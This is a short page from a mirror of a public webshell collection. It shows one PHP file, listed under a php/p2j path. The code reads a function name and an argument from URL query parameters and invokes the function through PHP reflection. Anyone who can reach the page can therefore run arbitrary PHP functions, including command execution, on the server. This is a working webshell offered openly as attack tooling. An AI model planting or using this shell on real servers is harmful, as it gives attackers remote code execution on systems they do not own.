mirror of
https://github.com/tennc/webshell
synced 2025-02-17 02:08:23 +00:00
281 B
281 B
![Title alt text](/Mirrors/webshell/media/commit/c80515aa3851a89e6f7ecf9f37b3dc321c9c2ef7/php/p2j/11.jpg)
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>